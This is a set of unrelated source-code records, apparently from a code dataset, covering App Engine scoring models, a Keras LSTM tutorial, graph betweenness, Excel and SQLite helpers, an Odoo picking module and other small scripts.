TS_NAME_score = db.FloatProperty() - Log(S) for each half-life being scored\r\n TS_hrs = db.FloatProperty() - Number of hours since 1/1/2001 at last scoring\r\n TS_half_lives - non-persisted list of half lives computed for this model \r\n \r\n Note, because app engine db.Model uses a metaclass, this could not\r\n be implemented as a class decorator, as it must be run during\r\n class definition time, before the metaclass code runs.\r\n \"\"\"\r\n \r\n if half_lives is None:\r\n half_lives = [hrsDay, hrsWeek, hrsMonth, hrsYear]\r\n \r\n def _scorable(cls_base):\r\n \"\"\"\r\n Return a new class with the same name as the original, but derived from\r\n the original class as it's base. This will allow the metaclass for the db.Model\r\n to execute at (new) class initialization time and recognize our newly added properties.\r\n \"\"\"\r\n prop_dict = {}\r\n prop_dict['TS_half_lives'] = tuple(half_lives)\r\n \r\n # Add Model properties to the class \r\n for hrs in half_lives:\r\n prop_dict['TS_%s_score' % halflife_name(hrs)] = db.FloatProperty(required=True, default=0.0)\r\n \r\n prop_dict['TS_hrs'] = db.FloatProperty(required=True, default=0.0)\r\n \r\n # Add timescore methods to the class\r\n for func in [update_scores, score_now, named_scores, is_new_score]:\r\n prop_dict[func.__name__] = func\r\n \r\n cls_new = type(cls_base.__name__, (cls_base,mixins.Cacheable), prop_dict)\r\n \r\n # For pickling to work - we need to have the same module name as the\r\n # wrapped class\r\n cls_new.__module__ = cls_base.__module__\r\n \r\n logging.info(\"Scoreable class: %r\" % cls_base.__name__)\r\n \r\n return cls_new\r\n\r\n \"\"\"\r\n These methods will be (dynamically) added to a db.Model class\r\n \"\"\"\r\n\r\n def update_scores(self, value=0, dt=None):\r\n \"\"\"\r\n Update the model properties for the timescore values to bring up to the current\r\n time. Increasing in score will (attempt to) write the datastore.\r\n \"\"\"\r\n for half_life in self.TS_half_lives:\r\n ts = self.score_now(half_life, dt, value=value)\r\n setattr(self, halflife_attr(half_life), ts.log_score)\r\n self.TS_hrs = ts.time_last\r\n \r\n # If we've updated score - we want to persist the model (eventually)\r\n if value > 0: \r\n self.set_dirty()\r\n \r\n def score_now(self, half_life, dt=None, value=0):\r\n \"\"\"\r\n Return the current timescore for the given half_life - optionally add a\r\n value to the current score.\r\n \r\n NOT written back to the data store\r\n \"\"\"\r\n ts = calc.Score(half_life, getattr(self, halflife_attr(half_life)), time_last=self.TS_hrs)\r\n ts.increment(value, hours_from_datetime(dt))\r\n return ts\r\n \r\n def named_scores(self, dt=None):\r\n \"\"\"\r\n Return a dictionary of timescore values for the current time. 
It is assumed\r\n that dt is >= any past scoring time for this model.\r\n \"\"\"\r\n mScores = {}\r\n for half_life in self.TS_half_lives:\r\n mScores[halflife_name(half_life)] = self.score_now(half_life, dt).score\r\n return mScores\r\n \r\n def is_new_score(self):\r\n \"\"\"\r\n Return True when the scores seem to be newly initialized.\r\n \"\"\"\r\n return self.TS_hrs == 0.0\r\n\r\n return _scorable\r\n\r\n\"\"\"\r\nTimescore helper functions\r\n\"\"\"\r\n\r\ndef order_by_score(query, half_life):\r\n \"\"\"\r\n modify the query to be ordered by descending score for the half-life given\r\n \"\"\"\r\n return query.order('-%s' % halflife_attr(half_life))\r\n\r\ndef set_timescore_results(results, half_life, dt=None):\r\n \"\"\"\r\n Add a (non-persisted) attribute 'timescore' to each model in the\r\n list of results, corresponding to the current (time-based) score\r\n for the given half_life.\r\n \"\"\"\r\n for model in results:\r\n if model is None:\r\n continue\r\n model.timescore = model.score_now(half_life, dt).score\r\n return results\r\n \r\ndef hours_from_datetime(dt=None):\r\n if dt is None:\r\n dt = reqfilter.get_request().dtNow\r\n ddt = dt - dtBase\r\n hrs = ddt.days*hrsDay + float(ddt.seconds)/60/60\r\n return hrs\r\n\r\ndef datetime_from_hours(hrs):\r\n ddt = timedelta(float(hrs/hrsDay))\r\n dt = dtBase + ddt\r\n return dt\r\n\r\ndef halflife_name(half_life):\r\n return {hrsDay:'day', hrsWeek:'week', hrsMonth:'month', hrsYear:'year'}.get(half_life, str(half_life))\r\n\r\ndef halflife_attr(half_life):\r\n return 'TS_%s_score' % halflife_name(half_life)\r\n","sub_path":"labs/py/kahnsept/thapp/timescore/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5765,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"515181821","text":"#!/usr/bin/env python2\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Mon Oct 8 17:05:14 2018\nTrying to paralelise things in python\n\n\"\"\"\n\nfrom joblib import Parallel, delayed\nimport multiprocessing\nimport itertools\n\n\n# what are your inputs, and what operation do you want to \n# perform on each input. 
For example...\ninputs = range(100) \njnputs =range(100)\n\ndef processInput(i):\n    return i**2\n    \nnum_cores = multiprocessing.cpu_count()\n\npairs=[]\nfor i in inputs:\n    pairs.append([i,jnputs[i]])\nresults=Parallel(n_jobs=num_cores)(delayed(processInput)(i) for i in inputs)\n\n\n\n# Trying to build input-parameter pairs\n\na = ['foo', 'bar', 'baz']\nb = ['x', 'y', 'z', 'w']\ninput_param=[]\nconstant=3\nfor r in itertools.product(a, b): input_param.append([r[0],r[1],constant])","sub_path":"Lammps/dev/Paralelise.py","file_name":"Paralelise.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"53195352","text":"#################################\n# Author : Abhisek Mohanty\n# Description : Reads the Sentiment training data from the dataset on disk, cleans the data and keeps it ready for the sentiment classifier.\n#################################\nimport re\n\ntry:\n    import json\nexcept ImportError:\n    import simplejson as json\n\nimport os\nimport pandas as pd\n\n\ndef clean_tweet(tweet_row):\n    tweet = tweet_row['SentimentText']\n    return ' '.join(re.sub(\"(@[A-Za-z0-9]+)|([^0-9A-Za-z \\t])|(\\w+:\\/\\/\\S+)\", \" \", tweet).split())\n\n\ndef readTrainingDataForSentimentAnalysis():\n    subdirectory = 'sentiment_train_data'\n    loaded_data = pd.read_csv(\n        os.path.join(subdirectory, 'train.csv'),\n        # os.path.join(subdirectory, 'Sentiment_Analysis_Dataset.csv'),\n        error_bad_lines=False\n    )\n\n    loaded_data.columns = ['Sentiment', 'id', 'date', 'query', 'user', 'SentimentText']\n    # loaded_data.head()\n    final_data = loaded_data\n    final_data = loaded_data.groupby('Sentiment').head(50000).reset_index(drop=True)  # Take the first 50,000 rows per sentiment class for training\n    final_data.shape\n\n    final_data['tweet'] = final_data.apply(lambda row: clean_tweet(row), axis=1)\n    return final_data\n
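\n\nif __name__ == '__main__':\n    # Editor's illustrative check (not in the original file): exercise the tweet cleaner,\n    # which strips @handles, URLs and punctuation before training.\n    row = {'SentimentText': '@user check https://t.co/xyz Great day!!'}\n    print(clean_tweet(row))  # -> 'check Great day'\n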
","sub_path":"src/sentiment_training_data.py","file_name":"sentiment_training_data.py","file_ext":"py","file_size_in_byte":1190,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"111165438","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Jul 27 22:10:07 2021\n\n@author: BT\n\"\"\"\n\n'''\nBecause of the transformations the data goes through when traversing an RNN, some\ninformation is lost at every time step. After a while, the RNN's state contains\nvirtually no trace of the first inputs. This behavior can be a deal-breaker.\n\nImagine that Dory (a character from the animated movies Finding Nemo and Finding Dory\nwho suffers from short-term memory loss) tries to translate a long sentence; by the\ntime she finishes reading it, she has no information left about its beginning.\n\nTo solve this problem, several types of cells with long-term memory have been devised.\nThey have proven so effective that basic cells are hardly used anymore. Let's start by\nstudying the most popular of these cells, the LSTM cell.\n\nLSTM Cell\n---------\nThe Long Short-Term Memory (LSTM) cell was proposed in 1997 by Sepp Hochreiter and\nJürgen Schmidhuber. It was gradually improved over the years by several researchers,\nsuch as Alex Graves (2013), Hasim Sak (2014) and Wojciech Zaremba (2014).\n\nIf you consider the LSTM cell as a black box, you can use it much like a basic cell,\nexcept it will perform much better. Training will converge faster, and it will detect\nlong-term dependencies in the data. In Keras, you simply replace the SimpleRNN layer\nwith an LSTM layer:\n'''\n\nimport tensorflow as tf\nimport numpy as np\n\nimport matplotlib as mpl\nimport matplotlib.pyplot as plt\n\nfrom utils import generate_time_series, generate_data, plot_series, plot_learning_curves\nfrom utils import plot_multiple_forecasts, last_time_step_mse\nnp.random.seed(42)\ntf.random.set_seed(42)\n\n# let's create an RNN that predicts the next 10 steps at each time step. \n# That is, instead of just forecasting time steps 50 to 59 based on time steps 0 to 49, \n# it will forecast time steps 1 to 10 at time step 0, then time steps 2 to 11 at time step 1, \n# and so on, and finally it will forecast time steps 50 to 59 at the last time step. \n# Notice that the model is causal: when it makes predictions at any time step, it can only see\n# past time steps.\nn_steps = 50\nseries = generate_time_series(10000, n_steps + 10)\nX_train = series[:7000, :n_steps]\nX_valid = series[7000:9000, :n_steps]\nX_test = series[9000:, :n_steps]\nY = np.empty((10000, n_steps, 10))\nfor step_ahead in range(1, 10 + 1):\n    Y[..., step_ahead - 1] = series[..., step_ahead:step_ahead + n_steps, 0]\ny_train = Y[:7000]\ny_valid = Y[7000:9000]\ny_test = Y[9000:]\n\n\nmodel = tf.keras.models.Sequential([\n    tf.keras.layers.LSTM(20, return_sequences=True, input_shape=[None, 1]),\n    tf.keras.layers.LSTM(20, return_sequences=True),\n    tf.keras.layers.TimeDistributed(tf.keras.layers.Dense(10))\n])\n\nmodel.compile(loss=\"mse\", optimizer=\"adam\", metrics=[last_time_step_mse])\nhistory = model.fit(X_train, y_train, epochs=20, validation_data=(X_valid, y_valid))\n\nseries = generate_time_series(1, 50 + 10, random_state=43)\nX_new, y_new = series[:, :50, :], series[:, 50:, :]\n\n# predict\ny_pred_lstm = model.predict(X_new)[:, -1][..., np.newaxis]\nloss_lstm = np.mean(tf.keras.metrics.mean_squared_error(y_new, y_pred_lstm))\n\nprint('-'*10)\nprint('shape y_pred_lstm', y_pred_lstm.shape)\nprint('loss loss_lstm =', loss_lstm)\nprint('-'*10)\n\nplot_multiple_forecasts(X_new, y_new, y_pred_lstm, 'Deep RNN with LSTM', loss_lstm)\nplt.show()\n\n'''\nAnother option is to use the generic keras.layers.RNN layer, passing it an LSTMCell\nas argument. However, since the LSTM layer implementation has been optimized to run\non GPUs, it is usually preferable to use it (the RNN layer is mostly useful when you\ndefine custom cells, as we did earlier):\n'''\nmodel = tf.keras.models.Sequential([\n    tf.keras.layers.RNN(tf.keras.layers.LSTMCell(20), return_sequences=True,input_shape=[None, 1]),\n    tf.keras.layers.RNN(tf.keras.layers.LSTMCell(20), return_sequences=True), \n    tf.keras.layers.TimeDistributed(tf.keras.layers.Dense(10))\n    ])\n\n'''\nSo how does an LSTM cell work? Its architecture is shown in figure lstm_cell.jpg.\nIf you don't look at what's inside the box, the LSTM cell looks very much like a\nregular cell, except that its state is split into two vectors: h(t) and c(t)\n(\"c\" for \"cell\").\n\nh(t) can be seen as the short-term state and c(t) as the long-term state.\n\nLet's open the box! The key idea is that\nthe network can learn what to store in the long-term state, what to throw away,\nand what to read from it. 
\n\nAs the long-term state c(t–1) traverses the network from left to right, it first\ngoes through a forget gate, dropping some information, then new information is added\nvia the addition operation (the added information is selected by an input gate), and\nthe result c(t) is sent straight out, without any further transformation. So, at each\ntime step, some information is dropped and some is added. Moreover, after the addition\noperation, the long-term state is copied and passed through the tanh function, and the\nresult is filtered by the output gate. This produces the short-term state h(t), which\nis equal to the cell's output for this time step, y(t).\n\nNow let's look at where the new information comes from and how the gates work.\nFirst, the current input vector x(t) and the previous short-term state h(t–1) are\nfed to four different fully connected layers, all serving a different purpose:\n\n    • The main layer outputs g(t)/C_t:\n    it has the usual role of analyzing the current inputs x(t) and the previous\n    (short-term) state h(t–1). A basic cell contains nothing but this layer, and its\n    output goes straight out to y(t) and h(t). In an LSTM cell, by contrast, this\n    layer's output does not go straight out; instead, its most important parts are\n    stored in the long-term state (and the rest is dropped).\n\n    • The three other layers are gate controllers. Since they use the logistic\n    activation function, their outputs range from 0 to 1. Because their outputs are\n    fed to element-wise multiplication operations, a value of 0 closes the gate,\n    while a value of 1 opens it. More precisely:\n\n        – The forget gate (controlled by f(t)) decides which parts of the long-term\n        state should be erased.\n\n        – The input gate (controlled by i(t)) selects which parts of g(t)/C_t should\n        be added to the long-term state.\n\n        – The output gate (controlled by o(t)) selects which parts of the long-term\n        state should be read and output at this time step, both to h(t)\n        and to y(t).\n\nIn short, an LSTM cell can learn to recognize an important input (that's the role of\nthe input gate), store it in the long-term state, preserve it for as long as it is\nneeded (that's the role of the forget gate), and extract it whenever it is needed.\nThis explains why these cells have been amazingly successful at capturing long-term\npatterns in time series, long texts, audio recordings, and more.\n\nThe equation in figure lstm_cell.jpg summarizes how to compute the cell's long-term\nstate, its short-term state, and its output at each time step for a single instance\n(the equations for a whole mini-batch are very similar).
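\n\n(Editor's note, not in the original file: for reference, the standard per-instance\nLSTM equations that the figure encodes are\n    i(t) = sigma(Wxi.T x(t) + Whi.T h(t-1) + b_i)\n    f(t) = sigma(Wxf.T x(t) + Whf.T h(t-1) + b_f)\n    o(t) = sigma(Wxo.T x(t) + Who.T h(t-1) + b_o)\n    g(t) = tanh(Wxg.T x(t) + Whg.T h(t-1) + b_g)\n    c(t) = f(t) * c(t-1) + i(t) * g(t)\n    y(t) = h(t) = o(t) * tanh(c(t))\nwhere sigma is the logistic function and * denotes element-wise multiplication.)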
\n'''\n\n","sub_path":"DL/15_RNNs/4_tackling_short_term_memory.py","file_name":"4_tackling_short_term_memory.py","file_ext":"py","file_size_in_byte":8340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"88888624","text":"__author__ = 'Charlie Mitchell '\n'''\nThis class will take in a request from the webserver, query the SQLite database,\nand return JSON.\n'''\n\nimport os\nimport sqlite3\n\nfrom common.GlobalConfig import Configuration\nfrom reportserver.manager import dateTimeUtility\n\ncfg_path = os.getenv('RECCE7_PLUGIN_CONFIG') or 'config/plugins.cfg'\nglobal_config = Configuration(cfg_path).getInstance()\ndb_path = global_config.get_db_dir() + '/honeyDB.sqlite'\n\n# Connect to given database.\n# Defaults to the honeypot db, but another path can be passed in (mainly for testing).\n# Database needs to exist first.\ndef connect(database_name=db_path):\n    if not os.path.exists(database_name):\n        print(\"Database does not exist in path: \" + database_name)\n        return None\n    try:\n        conn = sqlite3.connect(database_name)\n    except sqlite3.OperationalError:\n        print(\"Error connecting to database at: \" + database_name)\n    else:\n        return conn\n\n# Query DB and return JSON\n# setting DB to TestDB created from DatabaseHandlerTest.py\ndef query_db(query, args=(), one=False):\n    cur = connect().cursor()\n    cur.execute(query, args)\n    r = [dict((cur.description[i][0], value) \\\n              for i, value in enumerate(row)) for row in cur.fetchall()]\n    cur.connection.close()\n    return (r[0] if r else None) if one else r\n\n# Unit of Measure could be \"weeks\", \"days\", \"hours\", etc.\n# Return all data from the DB within that measure of time as JSON.\ndef get_json_by_time(portnumber, unit, unit_size):\n    begin_date = dateTimeUtility.get_begin_date(unit, unit_size)\n    begin_date_iso = dateTimeUtility.get_iso_format(begin_date)\n    tableName = get_table_name(portnumber)\n    date_time_field = get_table_datetime_field(portnumber)\n\n    # query = query_db(\"SELECT * FROM %s where (datetime > '%s')\" % (tableName, query_date_iso))\n    queryString = \"SELECT * FROM %s where (%s > '%s')\" % (tableName, date_time_field, begin_date_iso)\n    # print(\"queryString is: \" + queryString)\n    results = query_db(queryString)\n    # print(\"results: \" + results)\n\n    return results\n\n# Returns the table name of the given port number from the config file.\ndef get_table_name(portnumber):\n    gc_dict = global_config.get_plugin_config(portnumber)\n    return gc_dict['table']\n\n\n# Returns the name of the datetime field from the config file.\ndef get_table_datetime_field(portnumber):\n    return global_config.get_db_datetime_name()","sub_path":"reportserver/dao/DatabaseHandler.py","file_name":"DatabaseHandler.py","file_ext":"py","file_size_in_byte":2441,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"138590465","text":"import numpy as np\nimport matplotlib.pyplot as plt\n\n# Main\nt = np.linspace(0, 2 * np.pi, 400)\nplt.plot(np.cos(t), np.sin(t), label=\"circle\")\nx = [1, -1 / 2, -1 / 2, 1]\ny = [0, 3**(1 / 
2) / 2, 0]\nplt.plot(x, y, label=\"triangle\")\nplt.legend(loc=0)\nplt.title(\"Courbes paramétriques\")\nplt.axis(\"equal\")\nplt.show()\n","sub_path":"tp4/tp4ex5.py","file_name":"tp4ex5.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"587622693","text":"import sys\n\n#mapping between node name and index used in adjacency_matrix\n#format: {\"1\":0,\"2\":1,...}\nnode_dict = {}\ninverse_node_dict = {}\nadjacency_matrix = []\n#keep 2 nodes that have edge for printing later\npairs = []\n\ndef readNodes(file_name):\n global node_dict\n global inverse_node_dict\n global adjacency_matrix\n \n for line in open(file_name):\n l = line.replace(\"\\n\",\"\")\n if(len(l)==0):\n break\n x,y = l.split(\" \")\n \n if(len(node_dict)==0):\n node_dict[x] = 0\n \n if(x not in node_dict):\n node_dict[x] = max(node_dict.values()) + 1\n if(y not in node_dict):\n node_dict[y] = max(node_dict.values()) + 1\n pairs.append([ min( int(x),int(y) ),max( int(x),int(y) ) ] ) \n \n #construct inverse dictionary also\n inverse_node_dict = {v: k for k, v in node_dict.items()} \n #construct adjacency_matrix\n number_nodes = len(node_dict)\n for i in range(number_nodes):\n adjacency_matrix.append([0] * number_nodes) \n \n for line in open(file_name):\n l = line.replace(\"\\n\",\"\")\n if(len(l)==0):\n break\n x,y = l.split(\" \")\n index_x = node_dict[x]\n index_y = node_dict[y]\n adjacency_matrix[index_x][index_y] = 1 \n adjacency_matrix[index_y][index_x] = 1 \n \ndef constructTree(root):\n #contains all nodes in upper levels\n #format {1:Node(1),2:Node(2),...}\n all_upper_nodes = {}\n #contains all nodes of the current level\n #format {1:Node(1),2:Node(2),...}\n current_level_nodes = {}\n #contains all nodes of the lower 1 level\n #format {1:Node(1),2:Node(2),...}\n current_child_nodes = {}\n \n rootNode = Node(node_name=root,sum_parent_count=0.0,num_parent=0)\n current_level_nodes[rootNode.node_name] = rootNode\n \n while(len(current_level_nodes)>0):\n for nodeObject in current_level_nodes.values():\n index = nodeObject.node_name\n rows = adjacency_matrix[index]\n #look for all nodes that this node connected to\n for connected_index,is_edge_exist in enumerate(rows):\n #no edge between node{index} and node{connected_index}\n if(is_edge_exist==0):\n continue\n #don't perform bfs at the parents\n if(connected_index in all_upper_nodes):\n continue\n #don't perform bfs on a node with the same level\n if(connected_index in current_level_nodes):\n continue\n #if a child node is already connected by some nodes before\n if(connected_index in current_child_nodes):\n childNode = current_child_nodes[connected_index]\n childNode.increaseParentCount()\n childNode.sum_parent_count = childNode.sum_parent_count + nodeObject.num_parent\n nodeObject.addChild(childNode)\n continue\n #create a new child node\n childNode = Node(connected_index,sum_parent_count=max(1.0,nodeObject.num_parent))\n nodeObject.addChild(childNode)\n #add a new chld node to current_child_nodes\n current_child_nodes[childNode.node_name] = childNode\n #add nodes in the current level into all_upper_nodes\n all_upper_nodes.update(current_level_nodes)\n #iterate overs nodes in the next lower level \n current_level_nodes = current_child_nodes\n current_child_nodes = {}\n \n return all_upper_nodes \n \nclass Node:\n #node_score = 0.0\n #edges = [(childnodeA,edgeScore_to_A),(childnodeB,edgeScore_to_B),...]\n def __init__(self,node_name,sum_parent_count,num_parent=1): \n 
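#node_score accumulates betweenness credit, edges holds (child, edge_score) pairs; num_parent counts this node's parents in the BFS tree and sum_parent_count sums the parents' own counts\n 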
self.node_name = node_name\n self.node_score = 0.0\n self.edges = []\n self.num_parent = num_parent\n self.sum_parent_count = sum_parent_count\n \n def addChild(self, child_node, edge_score = 0.0):\n self.edges.append((child_node,edge_score)) \n \n def increaseParentCount(self):\n self.num_parent += 1 \n \n def __str__(self):\n original_name = inverse_node_dict[self.node_name]\n list_child_edges = []\n for edge in self.edges:\n childNode,edge_score = edge[0],edge[1]\n original_child_node_name = inverse_node_dict[childNode.node_name]\n list_child_edges.append((original_child_node_name,edge_score))\n return \"nodeName:{0},childEdges({1}),num_parent:{2},nodeScore:{3}\".format(original_name,list_child_edges,self.num_parent,self.node_score)\n \n def computeScore(self):\n #if this is a leaf node\n if(len(self.edges)==0):\n self.node_score = 1.0\n return self.node_score\n \n #adjust the current score to its number of parents otherwise\n self.node_score = max(1.0,self.num_parent)\n \n accum_score = 0.0\n #update the score of the edges connected to all of its child nodes\n new_edges = []\n for child_edge in self.edges:\n childNode = child_edge[0]\n child_score = childNode.computeScore()\n edge_score = self.node_score / childNode.sum_parent_count\n edge_score = edge_score * child_score\n new_edges.append((childNode,edge_score))\n accum_score += edge_score\n self.edges = new_edges\n #update the node's own score\n self.node_score = accum_score + 1.0\n return self.node_score\n \nif __name__ == '__main__': \n file_name = sys.argv[1]\n readNodes(file_name)\n #construct the edge-score matrix\n edge_score_matrix = []\n for i in range(len(adjacency_matrix)):\n edge_score_matrix.append([0.0] * len(adjacency_matrix)) \n \n #loop through every node and add up the score for each edge\n for i in range(len(node_dict)): \n root_index = i\n result = constructTree(root_index)\n rootNode = result[root_index]\n rootNode.computeScore()\n for i_index,nodeObject in result.items():\n for edge in nodeObject.edges:\n childNode,edge_score = edge[0],edge[1]\n j_index = childNode.node_name\n edge_score_matrix[i_index][j_index] = edge_score_matrix[i_index][j_index] + edge_score\n edge_score_matrix[j_index][i_index] = edge_score_matrix[i_index][j_index]\n \n #divide every score by 2\n for i in range(len(edge_score_matrix)):\n for j in range(len(edge_score_matrix)):\n edge_score_matrix[i][j] = edge_score_matrix[i][j] / 2.0\n \n #print out the result \n pairs = sorted(pairs) \n for pair in pairs:\n i_index = node_dict[str(pair[0])]\n j_index = node_dict[str(pair[1])]\n print(\"{0} {1}\".format(pair,edge_score_matrix[i_index][j_index])) \n ","sub_path":"Assignment5/nakareseisoon_vitid_betweenness.py","file_name":"nakareseisoon_vitid_betweenness.py","file_ext":"py","file_size_in_byte":6958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"433047781","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport logging\nimport numpy as np\nimport pandas as pd\nfrom keras.losses import mean_squared_error, huber_loss\nfrom keras.optimizers import Adadelta, SGD, Adam\n\nfrom fetal_brain_assessment.resnet_architecture import model_architecture as create_model_architecture\n\nlogger = logging.getLogger(__name__)\n\n\nclass Predictor:\n\tdef __init__(self, weights='/usr/local/share/fetal_brain_assessment/weights_resnet.hdf5'):\n\t\tlogger.debug('Creating model')\n\t\tself.model = create_model_architecture()\n\t\tlogger.debug('Model created')\n\n\t\tself.model.compile(\n\t\t\tloss=lambda y_true, 
y_pred: huber_loss(y_true, y_pred, delta=0.15),\n\t\t\toptimizer=Adam(lr=0.0001),\n\t\t\tmetrics=['mean_absolute_error'])\n\t\tlogger.debug('Model compiled')\n\t\tlogger.debug('Loading resnet weights from %s', weights)\n\t\tself.model.load_weights(weights)\n\t\tlogger.debug('Predictor object setup complete.')\n\n\tdef predict(self, stacked_data, row_names) -> pd.DataFrame:\n\t\tstacked_data = np.array(stacked_data, dtype=np.float32)\n\n\t\t# Normalize dataset\n\t\tmin1 = np.amin(stacked_data)\n\t\t# max1 = np.amax(volumes)\n\t\tmax1 = 10000\n\t\tlogger.info('Min: %s', min1)\n\t\tlogger.info('Max: %s', max1)\n\t\tstacked_data = (stacked_data - min1) / (max1 - min1)\n\t\tmin1 = np.amin(stacked_data)\n\t\tmax1 = np.amax(stacked_data)\n\t\tlogger.info('New min: %s', min1)\n\t\tlogger.info('New max: %s', max1)\n\n\t\tlogger.debug('Doing prediction')\n\t\tprediction = self.model.predict(stacked_data, verbose=1 if logger.level < 25 else 0)\n\n\t\tdf = pd.DataFrame(row_names, columns=['filename'])\n\t\tdf['quality'] = prediction\n\t\treturn df\n","sub_path":"fetal_brain_assessment/predict_resnet.py","file_name":"predict_resnet.py","file_ext":"py","file_size_in_byte":1589,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"549328958","text":"#coding=utf-8\nfrom openpyxl.workbook.workbook import Workbook\nfrom openpyxl.reader.excel import load_workbook\n\ndef excel_read(path):\n wb = load_workbook(path)\n sheet = wb.active\n return sheet\n# max_row = sheet.max_row\n# \n# for i in range(1,max_row+1):\n# if not sheet.cell(row=i,column=3).value:\n# continue\n# flag = UrlRedis.add_url(sheet.cell(row=i,column=3).value)\n# if flag:\n# continue\n \ndef get_excel_data(path=None,sheet=None,row_id=1):\n sheet = sheet or(excel_read(path) if path else None)\n container = []\n max_column = sheet.max_column \n for i in range(row_id,max_column+1):\n if not sheet.cell(row=1,column=i).value:\n continue\n container.append(sheet.cell(row=1,column=i).value)\n return container\n \n# def get_single_row_data(path=None,sheet=None,row_id=1):\n# get_title()\n\ndef get_single_column_data(sheet,colum_id):\n container = []\n max_row = sheet.max_row \n for i in range(3,max_row+1):\n if not sheet.cell(row=i,column=colum_id).value:\n continue\n container.append(sheet.cell(row=i,column=colum_id).value)\n return container\n\ndef get_excel_cell_data(sheet,row,column):\n v = sheet.cell(row=row,column=column).value\n return v if v else None \n \n ","sub_path":"spider/demo/test/education_crawler/utils/self_excel.py","file_name":"self_excel.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"} +{"seq_id":"639335424","text":"\nfile_name_list = [\"Backdoor\", \"Benign\", \"Rootkit\", \"Trojan\", \"Virus\", \"Worm\"]\ndata_header = []\ndata = {}\nfor i in range(file_name_list.__len__()):\n current_name = file_name_list[i]\n file_path = 'csv/' + current_name + '.csv'\n file = open(file_path, 'r')\n line = file.readline()\n if( i==0 ):\n data_header = line.split(\",\")\n\n data_samples = []\n while line:\n line = file.readline()\n data_samples.append(line.split(\",\"))\n\n data[current_name.lower()] = data_samples\n\n\nfor name in data_header:\n print(name)\n\ncount = 0\nfor keys in data.keys():\n print(keys)\n count += 1\n for line in data[keys]:\n 
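# Print each parsed sample row under its class label for manual inspection\n 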
print(line)\n","sub_path":"Python/preprocessing/feature_selection.py","file_name":"feature_selection.py","file_ext":"py","file_size_in_byte":665,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"464613388","text":"# -*- coding: utf-8 -*-\nfrom odoo import models, api, fields\nfrom odoo.exceptions import ValidationError\n\n\nclass StockPicking(models.Model):\n _inherit = 'stock.picking'\n\n sync_state = fields.Selection([('draft', 'Draft'), ('no_need', 'Not needed'), ('done', 'Done')], 'Middle-platform sync state', default='no_need', track_visibility='onchange')\n can_sync = fields.Boolean('Can be synced to the middle platform', compute='_compute_can_sync')\n\n # cancel_sync_state = fields.Selection([('draft', 'Draft'), ('no_need', 'Not needed'), ('done', 'Done')], 'Cancel-sync middle-platform state', default='no_need',\n # track_visibility='onchange', help='State of syncing to the middle platform after the order is cancelled')\n # can_cancel_sync = fields.Boolean('Cancellation can be synced to the middle platform', compute='_compute_can_sync')\n\n @api.multi\n def do_push_mustang(self):\n \"\"\"Push to the middle platform\"\"\"\n if self.initiate_system != 'ERP':\n raise ValidationError('Non-ERP documents do not need to be synced to the middle platform!')\n\n if self.backorder_id:\n raise ValidationError('This is a follow-up (backorder) document and does not need to be synced to the middle platform!')\n\n if self.state in ['draft', 'cancel']:\n raise ValidationError('Documents in draft or cancelled state cannot be synced!')\n\n if self.sync_state != 'draft':\n raise ValidationError('The middle-platform sync state is not draft, so the document cannot be synced!')\n\n self.env['cj.send']._cron_push_picking_mustang(self)\n\n # @api.multi\n # def do_cancel_push_mustang(self):\n # \"\"\"Push the cancellation to the middle platform\"\"\"\n # if self.initiate_system != 'ERP':\n # raise ValidationError('Non-ERP documents do not need to be synced to the middle platform!')\n #\n # if self.state != 'cancel':\n # raise ValidationError('Documents that are not cancelled cannot have their cancellation synced to the middle platform!')\n #\n # if self.cancel_sync_state != 'draft':\n # raise ValidationError('The cancel-sync state is not draft, so the cancellation cannot be synced!')\n #\n # self.env['cj.send']._cron_push_cancel_picking_mustang(self)\n\n @api.multi\n def _compute_can_sync(self):\n for picking in self:\n if picking.initiate_system != 'ERP':\n continue\n\n if picking.state not in ['draft', 'cancel'] and picking.sync_state == 'draft':\n picking.can_sync = True\n\n # if picking.backorder_id:\n # if picking.state == 'cancel' and picking.cancel_sync_state == 'draft':\n # picking.can_cancel_sync = True\n # else:\n # if picking.state not in ['draft', 'cancel'] and picking.sync_state == 'draft':\n # picking.can_sync = True\n\n # if picking.state == 'cancel' and picking.cancel_sync_state == 'draft':\n # picking.can_cancel_sync = True\n\n # @api.multi\n # def action_cancel(self):\n # res = super(StockPicking, self).action_cancel()\n # self.cancel_sync_state = 'draft'\n # return res\n\n # @api.one\n # def action_done(self):\n # across_obj = self.env['stock.across.move'] # inter-company transfer\n #\n # res = super(StockPicking, self).action_done()\n # if self.purchase_id:\n # across = across_obj.search([('purchase_order_id', '=', self.purchase_id.id)])\n # if across and across.origin_sale_order_id:\n # order = across.origin_sale_order_id\n # picking = list(order.picking_ids.filtered(lambda x: x.state not in ['draft', 'cancel', 'done']))\n # picking = picking and picking[0]\n # if picking:\n # # Check the availability state\n # if picking.state != 'assigned':\n # picking.action_assign()\n #\n # if picking.state == 'assigned':\n # picking.button_validate() # confirm the outgoing shipment\n #\n # return res\n\n\n","sub_path":"myaddons/cj_api/models/stock_picking.py","file_name":"stock_picking.py","file_ext":"py","file_size_in_byte":3890,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"18"}
+{"seq_id":"356346798","text":"\"\"\"Provides an App class.\"\"\"\n\nfrom ..auth import Client\nfrom .resource import 
